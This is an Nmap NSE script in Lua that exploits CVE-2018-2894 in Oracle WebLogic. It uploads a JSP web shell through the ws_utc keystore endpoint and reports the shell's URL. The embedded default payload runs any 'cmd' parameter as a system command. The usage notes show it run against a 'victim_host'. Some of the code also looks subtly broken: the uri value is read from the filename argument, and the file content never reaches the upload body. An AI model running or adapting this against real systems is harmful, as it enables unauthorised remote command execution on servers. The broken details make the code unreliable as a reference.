local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
description = [[
Weblogic CVE-2018-2894 
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 <target> -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
--   --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' <target> -p 7001
--
-- @output
-- PORT     STATE SERVICE
-- 7001/tcp open  afs3-callback
-- | weblogic-upload: 
-- |_  url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
--
-- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default /
-- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded
-- @args weblogic-cve-2018-2894.content  file's contents
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests

author = "Rvn0xsy <payloads@aliyun.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}


portrule = function(host,port)
	if(port.number == 7001)then
		return true
	end
	return false

end

add_formData = function(form,boundary)
	local contents = "\r\n"
	for key,value in pairs(form) do
		contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary)
	end
	-- return contents.."--\r\n"
	return contents
end

add_fileData = function(file,boundary)
	return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary)
end

action = function(host,port)
	form = {}
	file = {}
	shell = {}
	form["ks_name"] = "Exploit CVE-2018-2894"
	form["ks_edit_mode"] = "false"
	form["ks_password_front"] = "123456"
	form["ks_password"] = "123456"
	form["ks_password_changed"] = "true"
	file["name"]="ks_filename"
	file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
	file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
	time = os.time()
	uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/" 
	boundary = "-ABC"
	ks_name = "Exploit CVE-2018-2894"
	filename = time.."_"..file["filename"]
	post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
	options = {}
	options.header = {}
	options.content = "\r\n--"..boundary
	options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
	options.content = options.content .. add_formData(form,boundary)
	options.content = options.content .. add_fileData(file,boundary)
	resp = http.post(host,port,post_url,options,nil,nil)
	if(resp.status == 200)then
		shell["url"] = uri .. "ws_utc/config/keystore/"..filename
		return shell
	end
	return false
end